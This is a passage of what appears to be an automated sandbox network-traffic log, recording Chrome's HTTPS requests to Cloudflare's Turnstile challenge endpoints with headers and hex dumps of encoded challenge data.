                                                                                        2024-10-02 15:15:27 UTC16384OUTData Raw: 76 5f 38 63 63 35 61 35 61 34 37 65 30 36 34 33 65 39 3d 78 31 43 4f 25 32 62 73 41 30 6c 37 6c 45 7a 24 42 71 56 71 74 37 43 73 37 41 58 71 5a 71 35 67 6b 4a 7a 71 54 65 71 77 4e 75 30 41 6f 65 71 76 67 75 62 41 4b 71 42 33 71 41 6c 67 41 49 71 70 67 6b 30 41 54 7a 4f 73 70 59 71 76 4e 73 48 6b 39 2d 4e 71 61 31 4f 41 7a 43 30 69 47 67 41 62 71 63 4f 73 35 71 31 4a 4a 4f 71 4d 71 71 4e 41 74 45 4f 42 59 71 70 63 55 62 4f 31 74 52 62 4f 71 59 37 66 71 37 52 33 67 58 61 71 75 59 67 30 30 67 41 6a 71 74 7a 71 65 50 65 77 70 71 35 41 31 4f 41 74 73 75 77 61 7a 33 6b 33 4a 67 71 77 31 48 33 41 51 55 24 77 65 2b 35 71 66 32 41 4e 2b 44 43 71 45 4f 73 75 67 56 37 74 4c 71 41 48 44 33 76 55 74 33 52 6f 58 72 73 59 70 70 72 55 44 24 42 78 76 63 32 59 62 56 37 41
                                                                                        Data Ascii: v_8cc5a5a47e0643e9=x1CO%2bsA0l7lEz$BqVqt7Cs7AXqZq5gkJzqTeqwNu0AoeqvgubAKqB3qAlgAIqpgk0ATzOspYqvNsHk9-Nqa1OAzC0iGgAbqcOs5q1JJOqMqqNAtEOBYqpcUbO1tRbOqY7fq7R3gXaquYg00gAjqtzqePewpq5A1OAtsuwaz3k3Jgqw1H3AQU$we+5qf2AN+DCqEOsugV7tLqAHD3vUt3RoXrsYpprUD$Bxvc2YbV7A
                                                                                        2024-10-02 15:15:27 UTC15626OUTData Raw: 61 71 39 71 36 4a 35 46 4c 7a 41 55 71 68 36 36 71 71 35 41 67 73 62 71 35 71 44 71 24 6d 69 24 71 73 78 24 4e 73 73 71 78 4f 73 71 71 77 71 48 59 38 4e 41 53 71 55 4f 24 6c 71 4f 71 47 4f 6b 6c 73 69 71 42 71 37 7a 71 4f 71 6f 4f 6b 7a 71 6a 71 39 4f 73 71 71 74 71 5a 4f 75 31 41 55 71 49 4a 71 6d 6f 69 71 4a 71 73 6d 68 50 4f 43 71 24 6a 73 55 71 69 2b 43 77 73 65 77 52 71 6b 4a 41 42 71 79 7a 35 53 45 59 71 4c 71 41 4f 71 4f 41 71 4f 62 43 41 31 41 42 71 76 71 6b 37 71 37 4f 35 61 73 43 41 56 4f 75 71 45 69 71 7a 42 75 7a 73 4d 71 57 4f 6b 71 73 7a 41 58 7a 38 4e 41 68 64 69 71 45 4a 73 4b 71 44 71 65 41 67 76 77 39 43 74 6c 71 43 71 7a 71 78 76 73 75 71 39 30 36 46 77 54 67 42 69 50 6c 45 24 62 51 43 45 4d 71 62 59 62 71 62 4f 71 4e 71 66 71 37 34 45
                                                                                        Data Ascii: aq9q6J5FLzAUqh66qq5Agsbq5qDq$mi$qsx$NssqxOsqqwqHY8NASqUO$lqOqGOklsiqBq7zqOqoOkzqjq9OsqqtqZOu1AUqIJqmoiqJqsmhPOCq$jsUqi+CwsewRqkJABqyz5SEYqLqAOqOAqObCA1ABqvqk7q7O5asCAVOuqEiqzBuzsMqWOkqszAXz8NAhdiqEJsKqDqeAgvw9CtlqCqzqxvsuq906FwTgBiPlE$bQCEMqbYbqbOqNqfq74E
                                                                                        2024-10-02 15:15:27 UTC300INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:27 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 26796
                                                                                        Connection: close
                                                                                        cf-chl-gen: nbBhb4nb2z7FFx12XdBfsR7hxEqr6d3y5BjEB6Q7TZUv0CRCrBhuMka0seeNzBltPtQY3JrkRw56w4G6$Ru9XDx553Z2Ta7Ew
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a5dfff490fab-EWR
                                                                                        2024-10-02 15:15:27 UTC1069INData Raw: 6d 37 36 41 6b 73 53 43 6d 34 65 6a 71 71 4f 4e 72 63 72 47 78 62 44 55 6b 4c 66 4c 6c 71 57 37 7a 35 6e 58 72 74 53 64 7a 36 37 53 32 64 69 78 71 4c 7a 64 75 4c 7a 49 77 2b 6a 43 38 37 32 75 38 36 69 77 39 4d 33 45 31 2f 76 4d 2f 75 6e 39 30 76 4c 4e 76 51 66 78 78 4f 6e 5a 34 2b 76 35 34 4f 4c 75 43 67 37 4d 30 74 33 6a 34 4f 63 4f 38 2f 48 30 46 50 54 6d 36 52 30 53 33 77 48 67 4a 75 44 38 2f 67 67 45 35 41 55 65 41 42 77 50 38 41 41 48 35 67 67 72 37 53 59 32 44 69 30 37 4f 2f 6f 32 43 69 77 30 4d 66 30 32 41 53 59 58 51 55 45 5a 44 54 6b 75 41 68 35 42 53 77 31 4c 4e 6a 55 70 56 6b 4d 72 53 31 55 75 4d 68 49 31 46 44 74 55 54 6a 41 6b 58 44 4a 70 4e 7a 67 73 52 45 6f 72 4a 30 6c 43 54 44 42 4c 4c 6a 46 78 62 6c 4a 4d 56 31 4e 77 51 46 73 37 64 58 52
                                                                                        Data Ascii: m76AksSCm4ejqqONrcrGxbDUkLfLlqW7z5nXrtSdz67S2dixqLzduLzIw+jC872u86iw9M3E1/vM/un90vLNvQfxxOnZ4+v54OLuCg7M0t3j4OcO8/H0FPTm6R0S3wHgJuD8/ggE5AUeABwP8AAH5ggr7SY2Di07O/o2Ciw0Mf02ASYXQUEZDTkuAh5BSw1LNjUpVkMrS1UuMhI1FDtUTjAkXDJpNzgsREorJ0lCTDBLLjFxblJMV1NwQFs7dXR
                                                                                        2024-10-02 15:15:27 UTC1369INData Raw: 2b 76 45 77 64 71 35 77 75 48 75 34 4d 53 39 34 75 44 53 78 63 62 34 31 63 72 50 33 37 2b 36 79 2f 44 33 33 4e 53 39 77 76 77 42 31 64 72 35 32 77 6f 48 42 67 55 55 30 65 6e 65 34 2b 58 55 46 64 51 54 32 52 62 78 39 41 6e 76 48 50 7a 62 49 68 4d 64 39 69 6b 4c 46 67 45 4a 39 69 55 46 44 43 45 6a 4d 77 30 4f 43 43 73 6e 4e 51 6f 48 4f 7a 30 59 44 50 6b 77 47 2f 30 6b 52 42 59 78 4a 67 59 66 52 45 55 64 49 55 4d 6a 4a 41 6f 50 50 6c 45 74 49 6b 4a 61 50 54 59 6d 56 79 78 50 57 54 46 4f 57 44 56 6a 59 31 6f 6b 61 30 46 62 5a 43 46 4a 59 47 6c 75 4a 6d 46 73 53 56 42 68 4d 46 74 72 57 31 51 39 63 54 73 30 50 57 55 2b 66 56 63 2b 63 6f 5a 56 56 6f 56 72 58 58 74 37 66 49 53 55 61 47 6c 53 6c 31 56 6d 62 31 52 30 6a 47 70 61 6d 33 6d 42 6c 70 56 6d 62 32 57 41
                                                                                        Data Ascii: +vEwdq5wuHu4MS94uDSxcb41crP37+6y/D33NS9wvwB1dr52woHBgUU0ene4+XUFdQT2Rbx9AnvHPzbIhMd9ikLFgEJ9iUFDCEjMw0OCCsnNQoHOz0YDPkwG/0kRBYxJgYfREUdIUMjJAoPPlEtIkJaPTYmVyxPWTFOWDVjY1oka0FbZCFJYGluJmFsSVBhMFtrW1Q9cTs0PWU+fVc+coZVVoVrXXt7fISUaGlSl1Vmb1R0jGpam3mBlpVmb2WA
                                                                                        2024-10-02 15:15:27 UTC1369INData Raw: 7a 43 36 76 53 6d 78 2b 62 75 72 75 61 31 30 4d 58 39 2f 4c 6a 4d 75 74 53 37 37 50 48 4f 41 74 37 67 38 2b 50 37 35 67 33 50 41 66 48 4c 36 65 49 4b 39 63 6e 52 39 39 50 61 32 39 6f 4a 39 2b 76 37 34 66 59 45 33 41 41 43 45 77 48 39 47 79 63 41 42 41 34 67 36 51 41 4b 4a 79 59 78 4a 79 73 4c 4b 43 63 57 47 6a 33 78 43 78 41 73 44 6b 51 35 4d 6b 41 6b 49 79 45 57 50 67 67 4d 48 55 45 79 42 55 64 48 54 45 38 76 53 7a 6f 6c 53 56 4e 57 54 6a 34 2f 55 79 45 68 57 30 35 42 4d 6c 78 6c 50 6d 64 48 4a 31 78 4f 58 53 6c 42 58 45 74 73 64 57 70 44 56 6c 74 6e 65 58 41 38 61 33 42 39 56 46 70 68 59 57 52 35 53 58 6c 6e 65 30 4e 4a 58 57 71 42 63 58 52 66 66 57 6c 70 6b 33 42 69 69 47 5a 63 58 4a 5a 53 61 5a 39 61 64 58 68 64 6e 70 2b 55 5a 71 57 4c 6e 58 79 6d 65
                                                                                        Data Ascii: zC6vSmx+burua10MX9/LjMutS77PHOAt7g8+P75g3PAfHL6eIK9cnR99Pa29oJ9+v74fYE3AACEwH9GycABA4g6QAKJyYxJysLKCcWGj3xCxAsDkQ5MkAkIyEWPggMHUEyBUdHTE8vSzolSVNWTj4/UyEhW05BMlxlPmdHJ1xOXSlBXEtsdWpDVltneXA8a3B9VFphYWR5SXlne0NJXWqBcXRffWlpk3BiiGZcXJZSaZ9adXhdnp+UZqWLnXyme
                                                                                        2024-10-02 15:15:27 UTC1369INData Raw: 33 34 50 58 59 32 4e 6a 6d 35 75 75 35 2b 73 48 7a 38 4d 37 6a 35 77 62 43 33 76 66 33 2f 41 4c 62 79 65 77 41 44 50 48 72 7a 67 62 50 38 75 34 47 2b 65 38 4e 45 76 48 76 49 2f 63 5a 4a 53 54 66 46 76 7a 37 4b 77 67 70 41 42 38 79 4c 52 38 55 2f 54 59 74 47 51 6f 6e 38 51 2f 38 47 51 73 32 39 67 34 66 47 6a 67 6d 52 67 41 68 50 53 45 5a 50 69 67 4a 43 77 77 63 53 52 51 6d 49 79 77 72 53 52 59 7a 54 55 77 79 55 56 63 54 58 6c 77 79 50 31 6f 31 4b 43 51 69 4a 55 52 57 58 31 30 35 5a 6c 6f 38 4c 47 4a 76 54 6c 46 6f 65 32 31 4a 57 56 4e 77 50 6b 70 7a 50 6a 39 5a 52 6c 32 45 67 46 64 37 62 57 78 47 65 6b 78 77 6b 45 6c 71 5a 30 69 56 65 4a 52 78 56 59 56 38 63 6e 42 64 55 35 70 36 5a 4a 4e 39 6f 58 70 62 6e 57 5a 6c 71 58 74 6c 67 59 71 76 6e 47 2b 6e 63 33
                                                                                        Data Ascii: 34PXY2Njm5uu5+sHz8M7j5wbC3vf3/ALbyewADPHrzgbP8u4G+e8NEvHvI/cZJSTfFvz7KwgpAB8yLR8U/TYtGQon8Q/8GQs29g4fGjgmRgAhPSEZPigJCwwcSRQmIywrSRYzTUwyUVcTXlwyP1o1KCQiJURWX105Zlo8LGJvTlFoe21JWVNwPkpzPj9ZRl2EgFd7bWxGekxwkElqZ0iVeJRxVYV8cnBdU5p6ZJN9oXpbnWZlqXtlgYqvnG+nc3
                                                                                        2024-10-02 15:15:27 UTC1369INData Raw: 30 66 53 35 31 2f 4d 45 76 50 76 79 2f 64 45 4b 36 41 49 41 37 51 37 49 36 41 58 6f 34 41 66 66 45 65 2f 6d 38 4e 6f 46 44 68 73 4d 31 2f 4d 41 48 43 4c 6a 31 2f 45 70 46 68 7a 7a 48 4f 62 6b 35 77 30 6a 38 42 51 6c 49 41 51 51 46 69 4d 6f 44 79 34 52 50 52 55 58 45 66 77 64 4f 77 4d 6b 2f 6a 38 66 46 6a 55 32 2f 6b 6f 38 4a 43 74 48 53 6b 46 41 51 7a 42 53 4e 54 5a 48 54 43 63 74 48 78 35 61 4f 79 39 67 51 7a 35 43 57 30 6c 55 4a 6d 4d 34 54 47 56 43 4d 55 56 41 4c 6c 5a 48 52 46 49 34 5a 56 42 6d 52 56 52 7a 62 33 4a 37 62 55 35 30 64 58 56 65 59 33 52 42 61 49 70 4f 61 58 74 76 62 58 39 54 66 6d 43 4e 5a 47 36 44 6d 30 35 55 56 47 35 32 6b 33 56 35 62 4a 75 57 65 59 4b 42 59 36 47 6f 70 71 61 6d 61 71 47 48 72 33 43 64 67 72 53 48 65 4b 79 55 64 4b 75
                                                                                        Data Ascii: 0fS51/MEvPvy/dEK6AIA7Q7I6AXo4AffEe/m8NoFDhsM1/MAHCLj1/EpFhzzHObk5w0j8BQlIAQQFiMoDy4RPRUXEfwdOwMk/j8fFjU2/ko8JCtHSkFAQzBSNTZHTCctHx5aOy9gQz5CW0lUJmM4TGVCMUVALlZHRFI4ZVBmRVRzb3J7bU50dXVeY3RBaIpOaXtvbX9TfmCNZG6Dm05UVG52k3V5bJuWeYKBY6GopqamaqGHr3CdgrSHeKyUdKu
                                                                                        2024-10-02 15:15:27 UTC1369INData Raw: 38 58 7a 30 4e 58 6b 42 67 48 4b 44 41 72 2b 33 75 4c 63 45 74 50 67 33 67 76 79 2b 50 4d 4c 42 51 33 5a 43 66 54 32 45 2f 30 47 46 43 55 49 33 2f 4d 71 39 4f 77 73 35 53 73 62 42 4f 73 71 4d 6a 41 6a 39 75 38 50 44 53 77 78 4e 76 59 64 4f 2f 67 74 4f 77 55 65 41 54 38 33 51 7a 51 61 42 30 41 70 52 6a 42 43 51 6b 77 6d 4c 77 35 57 4a 6a 51 72 57 53 77 6e 50 7a 30 2f 47 6d 46 63 4e 45 45 76 52 54 6c 61 4b 6c 59 36 58 55 78 68 51 54 39 74 4b 31 52 41 62 57 4e 4e 51 31 64 73 55 48 31 39 58 6b 35 67 56 34 4e 6a 68 6b 64 6e 58 47 65 4a 68 47 42 6f 5a 34 39 78 6b 6b 2b 4b 63 35 5a 58 67 34 4a 35 5a 4a 71 48 6b 32 69 4b 66 35 57 65 6e 34 39 31 63 4b 69 54 64 34 69 74 6d 48 74 6d 71 35 43 41 71 62 4f 46 67 48 61 32 6a 5a 4f 59 70 5a 42 33 6e 4c 4f 73 6b 48 75 75
                                                                                        Data Ascii: 8Xz0NXkBgHKDAr+3uLcEtPg3gvy+PMLBQ3ZCfT2E/0GFCUI3/Mq9Ows5SsbBOsqMjAj9u8PDSwxNvYdO/gtOwUeAT83QzQaB0ApRjBCQkwmLw5WJjQrWSwnPz0/GmFcNEEvRTlaKlY6XUxhQT9tK1RAbWNNQ1dsUH19Xk5gV4NjhkdnXGeJhGBoZ49xkk+Kc5ZXg4J5ZJqHk2iKf5Wen491cKiTd4itmHtmq5CAqbOFgHa2jZOYpZB3nLOskHuu
                                                                                        2024-10-02 15:15:27 UTC1369INData Raw: 62 31 33 4e 2f 75 2b 75 2f 53 45 76 34 4b 7a 68 67 44 35 39 59 5a 42 64 55 4b 48 77 6e 61 33 69 55 4f 47 74 34 6f 45 77 6e 33 34 67 72 6e 41 43 73 62 45 50 49 30 48 65 38 51 4f 53 48 7a 45 42 73 6e 4d 78 68 42 4b 78 42 43 50 53 34 41 48 50 34 6d 41 77 4e 4e 4e 6b 4d 63 54 7a 73 68 49 46 41 39 44 6b 49 50 51 68 51 6f 56 30 55 58 57 68 64 4b 4d 46 35 67 51 69 42 41 59 6c 4e 4a 4e 47 31 57 59 6d 70 77 57 53 74 75 55 31 39 56 55 48 4e 6a 57 56 42 34 5a 54 68 4d 67 57 70 66 62 6f 4e 75 5a 57 43 46 63 55 4f 47 68 58 68 64 5a 4a 42 75 54 47 53 54 66 6b 2b 53 6c 34 4e 35 61 4a 71 46 57 48 52 2f 69 35 61 65 70 49 39 31 65 4b 4b 54 59 32 75 74 6d 48 75 61 72 5a 74 73 67 4c 4f 66 6c 59 53 31 6f 71 35 33 75 5a 70 34 6a 4c 75 71 66 4a 54 42 72 72 75 63 78 4c 47 43 74
                                                                                        Data Ascii: b13N/u+u/SEv4KzhgD59YZBdUKHwna3iUOGt4oEwn34grnACsbEPI0He8QOSHzEBsnMxhBKxBCPS4AHP4mAwNNNkMcTzshIFA9DkIPQhQoV0UXWhdKMF5gQiBAYlNJNG1WYmpwWStuU19VUHNjWVB4ZThMgWpfboNuZWCFcUOGhXhdZJBuTGSTfk+Sl4N5aJqFWHR/i5aepI91eKKTY2utmHuarZtsgLOflYS1oq53uZp4jLuqfJTBrrucxLGCt
                                                                                        2024-10-02 15:15:27 UTC1369INData Raw: 76 42 2f 33 6a 41 67 30 43 30 66 63 64 42 64 55 65 43 41 7a 77 36 76 4d 4e 37 51 41 67 39 77 4d 4c 4b 77 73 73 39 79 59 62 36 69 6e 37 46 6a 59 71 46 51 59 36 41 78 6b 4d 4c 76 30 70 4b 54 41 4d 4c 43 30 56 49 45 4d 6f 46 45 46 48 48 68 6b 63 51 51 64 47 51 52 34 66 53 79 73 6f 4e 68 42 57 55 69 56 4d 56 68 63 72 4c 31 41 6a 54 53 34 33 4f 6c 4e 43 57 6b 73 66 54 46 30 36 4f 32 64 44 52 46 49 73 62 6d 35 42 61 48 4a 35 52 30 74 73 4f 6d 6c 4b 55 31 5a 76 54 6e 5a 6e 4f 31 68 35 56 6c 65 43 52 6d 42 75 53 48 43 4b 58 59 53 4f 6c 47 4e 6f 6b 59 64 71 6a 32 79 4a 56 34 43 53 70 59 32 61 58 36 57 4b 6c 32 4f 6b 59 34 75 6d 6d 4a 42 38 71 61 2b 47 67 59 53 70 65 61 36 73 66 4b 57 74 76 61 75 66 66 4a 79 2f 70 72 4e 2f 73 70 79 6b 6f 38 75 74 7a 61 54 47 6f 36
                                                                                        Data Ascii: vB/3jAg0C0fcdBdUeCAzw6vMN7QAg9wMLKwss9yYb6in7FjYqFQY6AxkMLv0pKTAMLC0VIEMoFEFHHhkcQQdGQR4fSysoNhBWUiVMVhcrL1AjTS43OlNCWksfTF06O2dDRFIsbm5BaHJ5R0tsOmlKU1ZvTnZnO1h5VleCRmBuSHCKXYSOlGNokYdqj2yJV4CSpY2aX6WKl2OkY4ummJB8qa+GgYSpea6sfKWtvauffJy/prN/spyko8utzaTGo6


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.449771104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:28 UTC485OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/25142125:1727879247:3UWyJf9ofqFKU96Nb8CK_rz0Q3BK9EjQwablSo10HGc/8cc5a5a47e0643e9/ede8e2645a67d81 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:28 UTC349INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 02 Oct 2024 15:15:28 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 7
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        cf-chl-out: 5e8habOw1GJ34/SbNspn1jsEnPgDGxt/3v0=$vjglxguqQ59+HjRL
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a5e599720f3e-EWR
                                                                                        2024-10-02 15:15:28 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                        Data Ascii: invalid


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.460331104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:38 UTC925OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/25142125:1727879247:3UWyJf9ofqFKU96Nb8CK_rz0Q3BK9EjQwablSo10HGc/8cc5a5a47e0643e9/ede8e2645a67d81 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 34403
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        CF-Challenge: ede8e2645a67d81
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:38 UTC16384OUTData Raw: 76 5f 38 63 63 35 61 35 61 34 37 65 30 36 34 33 65 39 3d 78 31 43 4f 25 32 62 73 41 30 6c 37 6c 45 7a 24 42 71 56 71 74 37 43 73 37 41 58 71 5a 71 35 67 6b 4a 7a 71 54 65 71 77 4e 75 30 41 6f 65 71 76 67 75 62 41 4b 71 42 33 71 41 6c 67 41 49 71 70 67 6b 30 41 54 7a 4f 73 70 59 71 76 4e 73 48 6b 39 2d 4e 71 61 31 4f 41 7a 43 30 69 47 67 41 62 71 63 4f 73 35 71 31 4a 4a 4f 71 4d 71 71 4e 41 74 45 4f 42 59 71 70 63 55 62 4f 31 74 52 62 4f 71 59 37 66 71 37 52 33 67 58 61 71 75 59 67 30 30 67 41 6a 71 74 7a 71 65 50 65 77 70 71 35 41 31 4f 41 74 73 75 77 61 7a 33 6b 33 4a 67 71 77 31 48 33 41 51 55 24 77 65 2b 35 71 66 32 41 4e 2b 44 43 71 45 4f 73 75 67 56 37 74 4c 71 41 48 44 33 76 55 74 33 52 6f 58 72 73 59 70 70 72 55 44 24 42 78 76 63 32 59 62 56 37 41
                                                                                        Data Ascii: v_8cc5a5a47e0643e9=x1CO%2bsA0l7lEz$BqVqt7Cs7AXqZq5gkJzqTeqwNu0AoeqvgubAKqB3qAlgAIqpgk0ATzOspYqvNsHk9-Nqa1OAzC0iGgAbqcOs5q1JJOqMqqNAtEOBYqpcUbO1tRbOqY7fq7R3gXaquYg00gAjqtzqePewpq5A1OAtsuwaz3k3Jgqw1H3AQU$we+5qf2AN+DCqEOsugV7tLqAHD3vUt3RoXrsYpprUD$Bxvc2YbV7A
                                                                                        2024-10-02 15:15:38 UTC16384OUTData Raw: 61 71 39 71 36 4a 35 46 4c 7a 41 55 71 68 36 36 71 71 35 41 67 73 62 71 35 71 44 71 24 6d 69 24 71 73 78 24 4e 73 73 71 78 4f 73 71 71 77 71 48 59 38 4e 41 53 71 55 4f 24 6c 71 4f 71 47 4f 6b 6c 73 69 71 42 71 37 7a 71 4f 71 6f 4f 6b 7a 71 6a 71 39 4f 73 71 71 74 71 5a 4f 75 31 41 55 71 49 4a 71 6d 6f 69 71 4a 71 73 6d 68 50 4f 43 71 24 6a 73 55 71 69 2b 43 77 73 65 77 52 71 6b 4a 41 42 71 79 7a 35 53 45 59 71 4c 71 41 4f 71 4f 41 71 4f 62 43 41 31 41 42 71 76 71 6b 37 71 37 4f 35 61 73 43 41 56 4f 75 71 45 69 71 7a 42 75 7a 73 4d 71 57 4f 6b 71 73 7a 41 58 7a 38 4e 41 68 64 69 71 45 4a 73 4b 71 44 71 65 41 67 76 77 39 43 74 6c 71 43 71 7a 71 78 76 73 75 71 39 30 36 46 77 54 67 42 69 50 6c 45 24 62 51 43 45 4d 71 62 59 62 71 62 4f 71 4e 71 66 71 37 34 45
                                                                                        Data Ascii: aq9q6J5FLzAUqh66qq5Agsbq5qDq$mi$qsx$NssqxOsqqwqHY8NASqUO$lqOqGOklsiqBq7zqOqoOkzqjq9OsqqtqZOu1AUqIJqmoiqJqsmhPOCq$jsUqi+CwsewRqkJABqyz5SEYqLqAOqOAqObCA1ABqvqk7q7O5asCAVOuqEiqzBuzsMqWOkqszAXz8NAhdiqEJsKqDqeAgvw9CtlqCqzqxvsuq906FwTgBiPlE$bQCEMqbYbqbOqNqfq74E
                                                                                        2024-10-02 15:15:38 UTC1635OUTData Raw: 62 31 71 63 65 77 38 4f 38 44 79 43 45 74 71 34 6b 49 77 45 6b 31 66 37 59 51 41 34 38 6a 46 69 63 39 65 57 5a 79 56 65 6a 77 66 2b 4f 78 65 6a 53 66 65 53 4c 34 34 43 71 7a 6f 69 54 57 59 4f 68 77 7a 64 41 7a 43 68 6a 42 61 4d 2d 7a 56 50 67 63 57 6a 4b 32 42 33 67 41 37 49 51 4f 62 49 59 30 63 70 71 35 34 42 55 6c 67 4f 36 6c 48 54 45 5a 4f 65 42 73 6f 52 70 67 42 43 71 4b 58 6d 71 45 54 79 4b 54 64 67 73 39 42 4f 52 65 4e 36 2b 32 39 6c 70 44 74 6c 71 52 49 59 4f 73 74 24 6c 71 79 37 4e 75 6b 7a 2d 45 42 63 42 73 38 52 79 30 76 35 41 4f 71 30 67 56 54 48 31 39 56 75 79 4f 5a 39 55 68 56 56 76 42 78 33 6d 51 4e 4f 4a 24 6f 62 4f 65 6b 32 59 58 74 51 69 79 57 39 57 66 77 30 56 57 46 4b 67 78 53 4b 45 62 57 42 62 4c 43 4a 5a 68 42 71 35 56 71 4e 37 50 71
                                                                                        Data Ascii: b1qcew8O8DyCEtq4kIwEk1f7YQA48jFic9eWZyVejwf+OxejSfeSL44CqzoiTWYOhwzdAzChjBaM-zVPgcWjK2B3gA7IQObIY0cpq54BUlgO6lHTEZOeBsoRpgBCqKXmqETyKTdgs9BOReN6+29lpDtlqRIYOst$lqy7Nukz-EBcBs8Ry0v5AOq0gVTH19VuyOZ9UhVVvBx3mQNOJ$obOek2YXtQiyW9Wfw0VWFKgxSKEbWBbLCJZhBq5VqN7Pq
                                                                                        2024-10-02 15:15:38 UTC1291INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:38 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 4476
                                                                                        Connection: close
                                                                                        cf-chl-out: RHKK7hy4ALO+faQP7O6+ZYtDI0GMMjv5bmV0NJ4zqwhLj6NZalc3pYE7gYKiuYqrMIIvx6A4xEUM/k5Q0DR7RtYyyyZEKr2e5PlKPmejqiw08Cq7tmNcA38=$ZZaSIZk0lYtRyJ9o
                                                                                        cf-chl-out-s: n7J0iWpWDZVlWFqV4ySlZlodc55JAveSSHtPqyB/q43nRm8cM/r9l17ru1Yea611AuVZaB9dwEtEDP3v5IYxr2xf2Lcu7NStPAEXYUdvJl6iLNLUecdseHW0ehmYJ4k0Mi1wyaCMYihOB/xFneNSoWn4J8Y1mE5FA6fJY1e9cqwcBY6sRyHaesurStXtUqDP0YgEDMDF6FVES2wHndsS0uAQWdD8/EKUAowOqCwSu90Zfr0F/WqxKgx49TnTJ+jJPddKdLSqCtC/dCo5v5QHOsvC3Zq44PaF7wKesFosjuQAPsafp8cTvJeYZHNUWxhXSbcTftspxMMBE4JN2auujGhoA/Hh5fdJovcNPUSCHEvci6+zabgc7CzL6hKNwsm7dr8EPBe8uevbRdCgCTkZ3gIPq870exz1zDLCoJhzoFkr0e3l7SOH3B8FblbkFpi7sA3lVgxKQTODVsqeJLVE38dOLsgDMmpqdYKyYwTuIo0YN8AAgwH6FS6H2Sug1x7W/Jbn262SXjAD8ru155E6XXPgoorcCgoei3BPzB7U4CIsUUHfD/l9suv5ye+gGJrZMX5pvn2ZbKuByLRwdZdMnKJqCJjU4a51BnreosvDeB0xqpz/qtvyekZmN5QFto73OoXylMNp5RE/OQFBITpVfsk4nLI1qBWNjBBHpFoF3YTB+5kuqBMMaUbSyFXLUyGOIbAJWm+zbOAPfiM+HvkJAcWcpOQ+xgxdIi0eBFWrO+ximptRXh5lvyozzx0JcP9fhQketRA0BV10o43oY1rt0mk0Ph5abFYnS+BpQWgmm+maaiJ/vYXK745mINB3CEf1H4NyClgzMShsK0IXhMGY67f5b1DGfjtbAM5kllJivm26nTbuBzcEKYvJDwKbQP7+Thck/UdQukiS+AIOpODkB3s=$oVFnk5mwdXDP46bE
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a6273b66c35e-EWR
                                                                                        2024-10-02 15:15:38 UTC78INData Raw: 6d 37 36 41 6b 73 53 43 6d 34 65 6a 71 71 4f 4e 72 63 72 47 78 62 44 55 7a 36 4c 4c 75 72 57 78 7a 61 32 62 77 4e 2f 50 72 64 36 58 31 61 61 78 76 4d 65 64 70 75 75 67 71 4f 32 78 7a 62 2f 77 74 64 48 44 38 73 76 52 31 2b 2f 4f 79 4d
                                                                                        Data Ascii: m76AksSCm4ejqqONrcrGxbDUz6LLurWxza2bwN/Prd6X1aaxvMedpuugqO2xzb/wtdHD8svR1+/OyM
